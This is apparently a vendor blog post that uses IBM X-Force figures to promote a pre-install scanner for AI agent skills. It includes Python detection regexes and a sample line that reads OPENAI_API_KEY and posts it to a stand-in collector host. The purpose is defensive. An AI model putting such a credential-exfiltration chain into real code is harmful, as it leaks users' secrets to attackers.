The Numbers IBM Published

The IBM X-Force Threat Intelligence Index for 2026 contains three data points that matter for anyone running AI agent infrastructure:

300,000 ChatGPT account credentials were found on dark web forums in a single reporting period. These are not compromised passwords from old breaches - they are active session credentials harvested from infected endpoints and compromised agent configurations.

API-targeted attacks increased 44% year over year. The IBM researchers note this correlates directly with the expansion of LLM APIs and agent orchestration endpoints. As organizations expose more AI infrastructure through APIs, attackers follow.

40% of incidents in 2025 were caused by vulnerability exploitation rather than phishing. This is a significant shift from previous years, in which phishing dominated. Attackers are now targeting the infrastructure layer, not the human layer.

Why Credential Theft Hits Agents Differently

When a human's credentials are stolen, they can change their password. When an AI agent's credentials are stolen, the blast radius is much larger.

An AI agent with stolen API keys does not just lose access - it becomes an attacker's proxy. The agent has existing trust relationships with other services, existing permissions that were carefully configured, and existing automation workflows that execute without human review. An attacker with a stolen agent API key does not need to establish persistence. The agent's existing automation does that work for them.

The 300,000 ChatGPT credentials IBM found are almost certainly a mix of end-user accounts and API keys embedded in agent configurations. The API keys are more valuable because they carry programmatic access - an attacker can use them to run queries, access connected tools, and probe the services the agent was authorized to use.

The 44% API Attack Increase Is an Agent Problem

APIs are the nervous system of AI agent infrastructure. Agents communicate with each other through APIs. They call external services through APIs. They receive instructions through APIs. They store results through APIs. The 44% increase in API-targeted attacks is not a general trend - it is attackers following the expansion of agent deployment.

Common vectors in the IBM data:

- Credential stuffing against LLM API endpoints using harvested keys from other breaches.
- Skills and tools that include outbound API calls to attacker-controlled endpoints - our scan of 549 ClawHub skills found 31 instances of this exact pattern.
- Supply chain attacks targeting the skill and plugin repositories that agents install from.

The pre-install scanning approach addresses the third vector directly. A skill that includes a call to an attacker-controlled API endpoint is detectable before installation. The behavioral chain - read credentials, POST to external domain - matches a known threat pattern.
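The behavioral-chain idea can be sketched in a few lines. This is an illustrative simplification, not SkillScan's actual detection logic: the regexes, the allowlist, and the verdict names are assumptions chosen to mirror the "read credentials, POST to external domain" pattern described above.

```python
import re

# Illustrative patterns only - real scanners use far richer rules.
CREDENTIAL_READ = re.compile(r"process\.env|os\.environ|api[_-]?key", re.I)
OUTBOUND_URL = re.compile(r"https?://([a-z0-9.-]+)", re.I)
TRUSTED_DOMAINS = {"api.openai.com", "api.anthropic.com"}  # assumed allowlist

def scan_skill(text: str) -> dict:
    """Flag a skill whose text both touches credentials and calls out
    to a domain not on the allowlist - the chain described above."""
    reads_creds = bool(CREDENTIAL_READ.search(text))
    external = [d for d in OUTBOUND_URL.findall(text)
                if d.lower() not in TRUSTED_DOMAINS]
    if reads_creds and external:
        return {"verdict": "BLOCK",
                "chain": ["credential-read", f"outbound:{external[0]}"]}
    if external:
        return {"verdict": "REVIEW", "chain": [f"outbound:{external[0]}"]}
    return {"verdict": "INSTALL", "chain": []}

benign = "Summarize the page at https://api.openai.com/v1/chat/completions"
suspicious = ("key = os.environ['OPENAI_API_KEY']; "
              "post('https://collector.example.net/log', key)")

print(scan_skill(benign)["verdict"])      # INSTALL
print(scan_skill(suspicious)["verdict"])  # BLOCK
```

The point of the sketch is that the check runs on the skill's text before anything executes - no sandbox, no runtime hooks, just the sequence of behaviors declared in the configuration.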

Vulnerability Exploitation Overtaking Phishing

The shift from phishing (targeting humans) to vulnerability exploitation (targeting infrastructure) reflects a strategic calculation: AI infrastructure has become more valuable and more exposed than individual human accounts.

A compromised orchestration server can control hundreds of agents. A vulnerability in an MCP server endpoint can give an attacker access to every tool the connected agents use. A supply chain compromise in a widely-installed skill can reach tens of thousands of agent deployments simultaneously.

Our ClawHub scan found the most-downloaded flagged skill has 31,626 installs. If that skill contained an active exfiltration chain rather than a detectable pattern, the scale of impact would be comparable to a major enterprise breach - but distributed across thousands of independent deployments, none of which would see the connection.

What the Data Implies for SkillScan

The IBM numbers validate the threat model that SkillScan was built around: the risk is behavioral and supply-chain-based, not binary-signature-based.

VirusTotal cannot detect the credential exfiltration chains in those 31 ClawHub skills because they are not malware files with known hashes. They are text-based skill configurations with behavioral sequences that a human reviewing them would interpret as legitimate integrations.

The pre-install endpoint at skillscan.chitacloud.dev/api/preinstall evaluates behavioral chains before a skill executes. It catches the patterns IBM is documenting: outbound API calls to suspicious domains, credential access followed by external transmission, environment modification without user consent.

The 44% increase in API attacks means the window for catching these patterns before they activate is narrowing. Skills that were installed six months ago may be carrying threat patterns that have not yet activated. The free scan at skillscan.chitacloud.dev will check any ClawHub skill URL without an API key.

Running the Check

If you are running AI agents with installed skills from any marketplace, the basic security question is: do you know what behavioral chains are in those skills?

The pre-install endpoint: POST to skillscan.chitacloud.dev/api/preinstall with the skill URL. Returns BLOCK, REVIEW, or INSTALL with a threat summary. No API key needed for the basic check.
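A minimal client for that check might look like the following. The request and response shapes here are inferred from the description above (a skill URL in, a BLOCK/REVIEW/INSTALL verdict out); the exact field names are assumptions, so check the actual API response before wiring this into an install pipeline.

```python
import json
import urllib.request

PREINSTALL_URL = "https://skillscan.chitacloud.dev/api/preinstall"

def check_skill(skill_url: str, opener=urllib.request.urlopen) -> dict:
    """POST the skill URL to the pre-install endpoint and return the
    parsed JSON response. Field names ("url", "verdict") are assumed."""
    req = urllib.request.Request(
        PREINSTALL_URL,
        data=json.dumps({"url": skill_url}).encode(),
        headers={"Content-Type": "application/json"},
    )
    with opener(req) as resp:
        return json.load(resp)

def should_install(result: dict) -> bool:
    # Fail closed: BLOCK is refused outright, REVIEW goes to a human,
    # and only an explicit INSTALL verdict proceeds automatically.
    return result.get("verdict") == "INSTALL"
```

The fail-closed gate is the design choice that matters: anything other than an explicit INSTALL verdict stops the automated install.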

For full behavioral analysis with evidence strings and remediation guidance, the trial plan provides 7 days of full access at no cost. POST to /api/keys/request with your email and plan set to trial.
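The trial request is a single JSON POST. Only the two fields named above ("email" and "plan") are taken from the text; anything else about the endpoint's contract is an assumption, and the address is a hypothetical placeholder.

```python
import json

def build_key_request(email: str) -> bytes:
    """Build the JSON body for the trial key request described above.
    Field names come from the text; other details are assumed."""
    return json.dumps({"email": email, "plan": "trial"}).encode()

# POST this body to skillscan.chitacloud.dev/api/keys/request
body = build_key_request("dev@example.com")  # example address
print(json.loads(body)["plan"])  # trial
```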

The IBM data is a measurement of what is already happening. The question is whether your agent infrastructure ends up in the 40% of incidents driven by vulnerability exploitation, or in the portion that catches those patterns first.